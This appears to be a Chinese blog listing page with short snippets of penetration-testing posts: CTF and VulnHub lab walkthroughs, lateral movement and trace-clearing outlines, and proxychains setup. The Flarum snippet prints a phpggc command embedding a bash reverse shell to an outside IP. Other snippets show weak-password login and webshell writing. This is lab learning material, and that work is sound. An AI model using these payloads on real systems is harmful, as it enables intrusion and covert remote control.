- 2024-10-09横向移动与痕迹清理
目录横向移动漏洞利⽤服务利⽤IPC横向+计划任务横向计划任务横向WMI横向SMB横向DCOM横向WinRM横向PSEXEC横向其他⽅式横向软件部署利⽤GPO组策略横向密码喷洒密码策略检查喷洒主机喷洒⽤户名喷洒密码喷洒hash喷洒服务痕迹清除OPSEC清除webshell清除隧道⼯具清除落地
- 2024-09-20vulnhub - medium_socnet
medium_socnet基本信息kaliip:192.168.157.161靶机ip:192.168.157.179主机发现与端口扫描nmap-sT--min-rate10000-p-192.168.157.179nmap-sT-sV-sC-O-p22,5000192.168.157.179没什么可利用信息,web页面的输入框不会执行命令目录扫描gobusterdir-uhttp://1
- 2024-08-25春秋云镜 网鼎杯2022半决赛
现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0
- 2024-07-31SkyTower靶机
靶机地址:SkyTower:1~VulnHub一、信息收集步骤一:将攻击机kali和靶机均设为桥接模式,此时靶机的MAC地址为:步骤二:确定目标主机arp-scan-l得到目标主机IP为192.168.7.61步骤三:查看开放的端口nmap-sV-p-192.168.7.61步骤四:浏览器访问步骤五:目录扫描,无有用信息d
- 2023-11-13netsh、ssf、proxychains、netsh端口转发
端口转发1本地端口转发(正向代理)实验kali:192.168.9.16ubuntu:192.168.9.15ubuntu2:192.168.9.10首先就是主机安装ssh工具,用ssh做端口转发kali开启ssh服务,需要下载openssh-serverapt-getinstallopenssh-server然后开启ssh服务servicesshstart然后配置可使用密
- 2023-11-10春秋云镜 Flarum WP
春秋云镜FlarumWPadministrator、1chrishttps://www.leavesongs.com/PENETRATION/flarum-rce-tour.html生成反弹shell的payloadphpphpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/114.96.104.240/66660>&1'"根据文章复
- 2023-10-06macOS上proxychains使用注意事项
在使用brew安装的proxychains的时候,配置文件位于/usr/local/etc/proxychains在高版本macos上,默认启用了SIP保护,所以/usr/bin/目录下的文件无法使用proxychains解决办法:3.1关闭SIP保护首先重启Mac,按住Option键进入启动盘选择模式按⌘+R进入Recovery模式在屏幕的最
- 2023-06-24三层靶机内网渗透测试
三层靶机内网渗透测试信息收集目标ip:192.168.31.145端口信息收集:nmap-A-T4-p- 192.168.31.145开放端口:21/22/80/111/888/3306/8888 操作系统:Liunx分析利用21/22端口--弱口令爆破hydra-vV-lroot-P/usr/share/wordlists/metasploit/password.lst 192.1
- 2023-05-30Kali内置代理工具Proxychains的简单使用
1.介绍Kali中内置了ProxyChains开源代理工具,通过使用这个工具,可以让我们隐藏真实ip实现攻击、代理上网等使用ProxyChains,用户可以在KaliLinux中配置不同类型的代理服务器,包括HTTP、SOCKS4和SOCKS5代理。此外,用户还可以为不同的目标指定不同的代理服务器,以确保他们的行为不被检
- 2023-05-03记一次Visual Studio启动WSL远程调试的方法
安装wsl的方法在此就不提了,就说几点注意事项就行了Internal选项里记得打开tls1.2,不然store打开很可能报错然后在store里安装好Ubuntu后,记得先打开ps然后运行wsl--update然后在打开Ubuntu设置账号密码等安装好后,第一步就是sudoapt-getupdate,sudoapt-getupdateupgrade
- 2023-03-18linux下的全局代理工具proxychain
proxychain介绍本文介绍的是proxychains-ng项目在linux上运行一些命令的时候,经常访问到国外的网站,速度非常的慢,例如用git、wget等等,这个时候就可以通过proxychain工
- 2023-02-27vulnhub靶场之WORST WESTERN HOTEL: 1
准备:攻击机:虚拟机kali、本机win10。靶机:WorstWesternHotel:1,下载地址:https://download.vulnhub.com/worstwesternhotel/HotelWW.ova,下载后直接vbox打开即可。知识点:s
- 2022-12-12linux命令行代理神器-proxychains
https://zuoer.xin/?post=72 什么是 proxychains-ng项目主页:https://github.com/rofl0r/proxychains-ng proxychains-ng 介绍proxychainsng(newgeneration
- 2022-11-24kali linux 设置proxychains 代理
因为kali自带proxychains工具直接修改/etc/proxychains.conf配置文件直接修改socks4 127.0.0.1 1080值得注意的是在ssr上开启允许局域网上连接参考连接:https://w
- 2022-11-24ubuntu等debian系linux系统添加人脸识别howdy
准备proxychainsproxychains是用来给终端走代理的软件,因为下载howdy的时候有一部分的文件的服务器在国外,且被墙了。安装proxychainssudoaptinstallproxychains配
- 2022-10-21靶机: medium_socnet
靶机:medium_socnet准备工作需要你确定的事情:确定kali已经安装,并且能正常使用【本文不涉及kali安装配置】VirtualBox以前能正常导入虚拟文件ova能正常使用下